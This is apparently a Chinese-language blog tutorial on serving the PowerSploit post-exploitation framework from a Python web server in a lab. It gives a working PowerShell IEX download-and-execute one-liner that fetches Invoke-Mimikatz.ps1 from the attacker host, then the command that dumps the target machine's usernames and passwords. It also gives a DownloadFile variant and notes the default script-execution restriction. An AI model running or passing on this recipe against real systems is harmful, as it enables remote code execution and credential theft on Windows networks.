利用python搭建Powersploit

  • 2020 年 1 月 23 日
  • 筆記

powershell腳本站點的搭建

一、Powersploit

Powersploit是一款基於powershell的後滲透(Post-Exploitation)框架,集成大量滲透相關模組和功能。

下載powersploit

github地址: https://github.com/mattifestation/PowerSploit

二、搭建站點(這裡用python自帶的web服務,也可以用phpstudy等搭建站點)

1.實驗環境:

服務端:win7(python3.7)

客戶端:Windows server 2008

客戶端有python環境(用python的web服務),確保客戶端能連通服務端

2.實驗步驟:

服務端:(win7)

1.把下載好的powersploit,解壓

2.安裝python,cd到PowerSploit-master目錄裡面,並開啟web服務

  python -m http.server 80    #python3.7

3.本地測試python的web服務是否開啟

客戶端:(windows server2008)

客戶端測試:

可以看到通過客戶端的瀏覽器訪問到搭建的站點了

下面開始進行powersploit內網滲透神器其中的Invoke-Mimikatz.ps1腳本文件進行舉例

在客戶端載入服務端腳本並執行(IEX遠程下載腳本執行)

powershell載入iex(New-Object Net.WebClient).DownloadString('http://192.168.10.4/Exfiltration/Invoke-Mimikatz.ps1」)

 執行: Invoke-Mimikatz -DumpCreds

       效果圖如下:

  從上圖可以看到已經獲取到本機(windows server2008 的用戶名和密碼) 

Tips:還有一種可以直接把腳本文件下載下來的方式

$client=new-object System.Net.WebClient

$client.DownloadFile(『http://192.168.8.135/Exfiltration/Invoke-Mimikatz.ps1』,』C://Mimikatz.ps1』)

也可以直接運行腳本文件來進行內網攻擊,但這種方式並不推薦,因為系統出於安全考慮

powershell默認是不能執行本機上的.ps1文件的,這是因為ps有默認的安全限制